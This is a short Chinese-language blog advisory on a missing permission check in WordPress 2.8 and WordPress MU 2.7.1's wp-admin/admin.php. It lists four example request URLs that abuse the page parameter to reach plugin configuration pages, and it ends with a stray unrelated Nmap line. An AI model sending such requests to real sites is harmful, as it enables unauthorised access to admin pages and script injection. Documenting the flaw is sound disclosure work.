当前位置: iick's blog > 网站漏洞 > WordPress wp-admin/admin.php模块错误权限检查漏洞

WordPress wp-admin/admin.php模块错误权限检查漏洞

作者:hack1990 时间:10-10-02 阅读数:608人阅读

影响版本:
WordPress 2.8/WordPress MU 2.7.1

程序介绍:

WordPress是一款免费的论坛Blog系统。

漏洞分析:

WordPress对使用page参数的插件配置PHP模块缺少权限检查,如果非特权用户在请求中用admin.php替换了options-general.php或plugins.php,就可以非授权查看插件配置页面的内容,或修改某些插件选项并注入JavaScript代码。


漏洞利用:

http://www.example.com/wp-admin/admin.php?page=/collapsing-archives/options.txt
http://www.example.com/wp-admin/admin.php?page=akismet/readme.txt
http://www.example.com/wp-admin/admin.php?page=related-ways-to-take-action/options.php
http://www.example.com/wp-admin/admin.php?page=wp-security-scan/securityscan.php

 

# Nmap Security Scanner 7.0

上一篇:Ok3w新闻发布系统漏洞

下一篇:WordPress口令重置用户名枚举漏洞

相关文章

发表评论